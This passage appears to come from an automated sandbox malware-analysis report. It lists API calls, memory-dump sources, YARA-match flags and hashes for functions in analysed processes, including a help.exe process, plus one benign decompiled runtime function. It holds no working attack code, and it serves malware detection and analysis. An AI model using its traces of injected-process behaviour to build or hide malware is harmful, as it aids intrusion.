                                                                                                                          • Instruction Fuzzy Hash: 8BF0BEB12001443BDA20EF689C89EEB3B6EDF84754F018195F90DA7202CA31E9118BB4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02368D63, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0235F010,?,?,00000000), ref: 02368DAC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2422867632-0
                                                                                                                          • Opcode ID: 84e2b157666bb2ccd80a85a0ebaead15773778f682d08f32bb1b7b7c08cb635c
                                                                                                                          • Instruction ID: 9dff5ff9e5b35b47d6283ebe233f028db70432a548109ebf1eabe6e67855cc43
                                                                                                                          • Opcode Fuzzy Hash: 84e2b157666bb2ccd80a85a0ebaead15773778f682d08f32bb1b7b7c08cb635c
                                                                                                                          • Instruction Fuzzy Hash: 2EF0A7723807103BE33025589C06FA7775C9B56F54F254159F649EF1C5C6A5B00646A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02368D70, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0235F010,?,?,00000000), ref: 02368DAC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2422867632-0
                                                                                                                          • Opcode ID: 455ea9e339beb55c30ce56c4274de787e5e37a5d30235df051bb70f70d42b62d
                                                                                                                          • Instruction ID: cb9800528b29768b7e30cefec65c3fe8c7a9e5a8ccea6446e21b56a8fadf72ae
                                                                                                                          • Opcode Fuzzy Hash: 455ea9e339beb55c30ce56c4274de787e5e37a5d30235df051bb70f70d42b62d
                                                                                                                          • Instruction Fuzzy Hash: 22E06D733903043BE2306599AC02FA7B29C8B91B20F554026FA4DEB2C0D595F40546A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0236A390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0235F192,0235F192,?,00000000,?,?), ref: 0236A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                          • Instruction ID: 680b8fc495e4238013e43e8c242e259d6169ce619a266989819cade154c337ce
                                                                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                          • Instruction Fuzzy Hash: A9E01AB12002086BDB20DF49DC84EE737ADAF88650F018155BA0867241C930E8108BF5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0236A1F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(023644F6,?,02364C6F,02364C6F,?,023644F6,?,?,?,?,?,00000000,00000000,?), ref: 0236A21D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction ID: b01a1704dd4e264620ff27a711054d16d373577785363c93157488b08be946b7
                                                                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction Fuzzy Hash: 1EE046B1200208ABDB24EF99DC44EA777ADEF88750F118559FE086B241C630F910CBF0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0235F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,02358CF4,?), ref: 0235F6BB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2340568224-0
                                                                                                                          • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                                                                                          • Instruction ID: 088962a13b16ba739f371ebc1e379e4c824d1e3d60f94eff71738df223bab499
                                                                                                                          • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                                                                                          • Instruction Fuzzy Hash: 3AD0A7727903043BE620FAE49C07F2772CD5B45B04F494064FE4CDB3C7DA54E0104565
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0236A1B6, Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(023644F6,?,02364C6F,02364C6F,?,023644F6,?,?,?,?,?,00000000,00000000,?), ref: 0236A21D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: acd4ac879795ac88126d437e28d31ad21b67696f3ae5b45ffb214866f0c54eba
                                                                                                                          • Instruction ID: d91af1884d4f951ea0e8597c0542fc700074d0413efdd962b5fa94195d8d03b1
                                                                                                                          • Opcode Fuzzy Hash: acd4ac879795ac88126d437e28d31ad21b67696f3ae5b45ffb214866f0c54eba
                                                                                                                          • Instruction Fuzzy Hash: FAD0C9B4200109ABC710EF58E8948BB736EAF88214711C505FC1953205C531D8208AB1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02DC967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 4a0af53925cb40027101d15b397160ddce3b1b7230483153d0cb383aa82f1447
                                                                                                                          • Instruction ID: 2e261c451f9fdc000f07b3aed2bfad94e43531686deb67f9adac6b5b2e8eb4a6
                                                                                                                          • Opcode Fuzzy Hash: 4a0af53925cb40027101d15b397160ddce3b1b7230483153d0cb383aa82f1447
                                                                                                                          • Instruction Fuzzy Hash: FFB09B729414C5C9DA11E7A44608727790177D4741F26C555D1020765A4778C4D1F6B5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 02E1FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E02E1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02DCCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02E15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02E15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                          0x02e1fdda
                                                                                                                          0x02e1fde2
                                                                                                                          0x02e1fde5
                                                                                                                          0x02e1fdec
                                                                                                                          0x02e1fdfa
                                                                                                                          0x02e1fdff
                                                                                                                          0x02e1fe0a
                                                                                                                          0x02e1fe0f
                                                                                                                          0x02e1fe17
                                                                                                                          0x02e1fe1e
                                                                                                                          0x02e1fe19
                                                                                                                          0x02e1fe19
                                                                                                                          0x02e1fe19
                                                                                                                          0x02e1fe20
                                                                                                                          0x02e1fe21
                                                                                                                          0x02e1fe22
                                                                                                                          0x02e1fe25
                                                                                                                          0x02e1fe40

                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E1FDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02E1FE01
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02E1FE2B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: 930152a9e628fddc03ae31eb12d2d3b529d263eecc04c6da29c21c23f7943ef4
                                                                                                                          • Instruction ID: 64ada48cc3faed8742137f190feb397f50f4971089b0f9a69e36350dd6767ebf
                                                                                                                          • Opcode Fuzzy Hash: 930152a9e628fddc03ae31eb12d2d3b529d263eecc04c6da29c21c23f7943ef4
                                                                                                                          • Instruction Fuzzy Hash: 51F0F672240241BFE6311A55DC06F23BF6BEB84730F244325F628566D1EAA2FC60D6F0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Analysis Process: help.exe PID: 5944 Parent PID: 3440 help.exeCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 00E89F74, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00E89F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`$wK
                                                                                                                          • API String ID: 823142352-4126523962
                                                                                                                          • Opcode ID: 83e15d0d1536b05d97b01dc0a6296594f924e01e243923ca3195c2d783ebab47
                                                                                                                          • Instruction ID: 32664e650ea5f11229595c4df8403f8bf7ac3241f7d521a7cb10ecbefb8ec897
                                                                                                                          • Opcode Fuzzy Hash: 83e15d0d1536b05d97b01dc0a6296594f924e01e243923ca3195c2d783ebab47
                                                                                                                          • Instruction Fuzzy Hash: 6301B6B2204108AFDB08DF98DC95EEB37EAAF8C754F158659BA1DD7251C630E811CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E89F1A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00E89F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`$wK
                                                                                                                          • API String ID: 823142352-4126523962
                                                                                                                          • Opcode ID: 40b7c4121765085cce412e3b304e513b3eb0290636f74b43cd85688f8fcaf1f7
                                                                                                                          • Instruction ID: cb81e5e5aaa88cb10e90248faf9d8c2ec72579311cfa5b1540b5fec8ea378bca
                                                                                                                          • Opcode Fuzzy Hash: 40b7c4121765085cce412e3b304e513b3eb0290636f74b43cd85688f8fcaf1f7
                                                                                                                          • Instruction Fuzzy Hash: 3F01B2B2205108AFDB08CF98DC95EEB37EAAF8C754F158649FA1DD7241C630EC118BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E89F20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00E89F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`$wK
                                                                                                                          • API String ID: 823142352-4126523962
                                                                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction ID: 85fb197be0223bf8d734ebe5e1d27c2368562061cb0991e843651bf8e7518590
                                                                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction Fuzzy Hash: D3F0B2B2200208AFCB08DF88DC95EEB77EDAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E8A04A, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00E84D10,?,?,00E84D10,00000000,FFFFFFFF), ref: 00E8A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 253c5ad76745aedc14c6557aaf28ef044f9e8d0b7a0466cd19501b4d5afdb99b
                                                                                                                          • Instruction ID: 10dc72dda8f69a421bb4ebcaef88d501761bcd5cc3d6e6811b66c11705916f67
                                                                                                                          • Opcode Fuzzy Hash: 253c5ad76745aedc14c6557aaf28ef044f9e8d0b7a0466cd19501b4d5afdb99b
                                                                                                                          • Instruction Fuzzy Hash: FDF05476600214AFD710EF98DC40EA777A9EF88310F14855AFA5C9B281C631E91187A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E89FCB, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,00E849F1,?,?,?,?,00E849F1,FFFFFFFF,?,2M,?,00000000), ref: 00E8A015
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: e5acad5a1eddc461ee6f34251e3c72b1aa7f1d2ecebcdd1ba6ebf93cfc014c02
                                                                                                                          • Instruction ID: b83f7ef8d93b85463a56140ce035e577df081b95179cfc19ea5003e9b7d10553
                                                                                                                          • Opcode Fuzzy Hash: e5acad5a1eddc461ee6f34251e3c72b1aa7f1d2ecebcdd1ba6ebf93cfc014c02
                                                                                                                          • Instruction Fuzzy Hash: E8F0EC71200104AFDB04DF99DC51EDB77A9EF8C754F158259BE1DA7241D631E811CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E89FD0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,00E849F1,?,?,?,?,00E849F1,FFFFFFFF,?,2M,?,00000000), ref: 00E8A015
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                          • Instruction ID: 81403f44d26bff70e900d9926f59fdf661efecb6e8683d43e9e0663bd980e483
                                                                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                          • Instruction Fuzzy Hash: FFF0A4B2200208AFDB14DF89DC91EEB77ADAF8C754F158259BA1DA7241D630E8118BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E8A100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00E72D11,00002000,00003000,00000004), ref: 00E8A139
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                          • Instruction ID: 4eb5f9d4d6da73b962f6418171a2194e67bd2fb91cd8c4f8f56d15115830d73a
                                                                                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                          • Instruction Fuzzy Hash: FAF015B2200208AFDB14DF89DC81EAB77ADAF88750F158159BE0CA7241C630F810CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E8A050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00E84D10,?,?,00E84D10,00000000,FFFFFFFF), ref: 00E8A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                          • Instruction ID: b158b40e281291f258c7f4563a4a5546c9e8f9d6b564672fd43e895143223b4a
                                                                                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                          • Instruction Fuzzy Hash: 0BD012752002146BD710EB98DC45F97779DEF44750F154455BA1C5B242C530F90087E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 036C9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 8ab86acd6766db583d01ca786d4a4eb81bf07f3642caadee7351627e94af762a
                                                                                                                          • Instruction ID: 324586bf147b7ee7e1b01efc9f3f7f9f2b4d5b4caade96592cccb8c48b3683ee
                                                                                                                          • Opcode Fuzzy Hash: 8ab86acd6766db583d01ca786d4a4eb81bf07f3642caadee7351627e94af762a
                                                                                                                          • Instruction Fuzzy Hash: 6C9002B164104802D140B559440574600099BD1341F51C011A5058554E87998DD576A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 036C9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 7a8ae74fe67447a026a4cf4f5e6716df042af186d3416b5622b1b16a26e4a558
                                                                                                                          • Instruction ID: 45349bd1825356e37cd68c0510b9c54f41df3ad442a4cdd8edef7d468b39d7cb
                                                                                                                          • Opcode Fuzzy Hash: 7a8ae74fe67447a026a4cf4f5e6716df042af186d3416b5622b1b16a26e4a558
                                                                                                                          • Instruction Fuzzy Hash: 8A90027164104813D111B5594505707000D9BD1281F91C412A0418558D97968952B161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 036C9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: e27a26994b1033d6235773b61bfc5afe75be1fb94162df285ae6a10c0728c386
                                                                                                                          • Instruction ID: 46e33e209d122643c1002bfe7139eae53b110e5678ce7791fc4a9f85a8a07384
                                                                                                                          • Opcode Fuzzy Hash: e27a26994b1033d6235773b61bfc5afe75be1fb94162df285ae6a10c0728c386
                                                                                                                          • Instruction Fuzzy Hash: 1790027175118802D110B559840570600099BD2241F51C411A0818558D87D588917162
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 036C9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: ecc928c812e48e074e803756eed5784278b03efa1e1efd0f7021c66ab73d1e45
                                                                                                                          • Instruction ID: dfc08493899e5f680aa0e69538494563e32e35ad42a49fd29cd1c42dc0359ad4
                                                                                                                          • Opcode Fuzzy Hash: ecc928c812e48e074e803756eed5784278b03efa1e1efd0f7021c66ab73d1e45
                                                                                                                          • Instruction Fuzzy Hash: 3490027164104C02D180B559440564A00099BD2341F91C015A0019654DCB558A5977E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 036C96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 16a0fdf2333a60ccf1cea270a40c58cb4db9e3c09fd1e4568fd28b458717d370
                                                                                                                          • Instruction ID: 41e4d6ca313997977655c684d0692287d2ce167f5672d0a092d6d762d286aa41
                                                                                                                          • Opcode Fuzzy Hash: 16a0fdf2333a60ccf1cea270a40c58cb4db9e3c09fd1e4568fd28b458717d370
                                                                                                                          • Instruction Fuzzy Hash: 289002716410CC02D110B559840574A00099BD1341F55C411A4418658D87D588917161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 036C95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 920d6ae0982b7f2491fd3d6dbce846ebb5fd6293eb87687296e246cd54d32112
                                                                                                                          • Instruction ID: e26ef1cc8518a447ead0824608875f03d6456e7c9a38f9ba1a9d565b0daef3cf
                                                                                                                          • Opcode Fuzzy Hash: 920d6ae0982b7f2491fd3d6dbce846ebb5fd6293eb87687296e246cd54d32112
                                                                                                                          • Instruction Fuzzy Hash: CC9002A1642044034105B5594415616400E9BE1241F51C021E1008590DC66588917165
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00E8A1F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
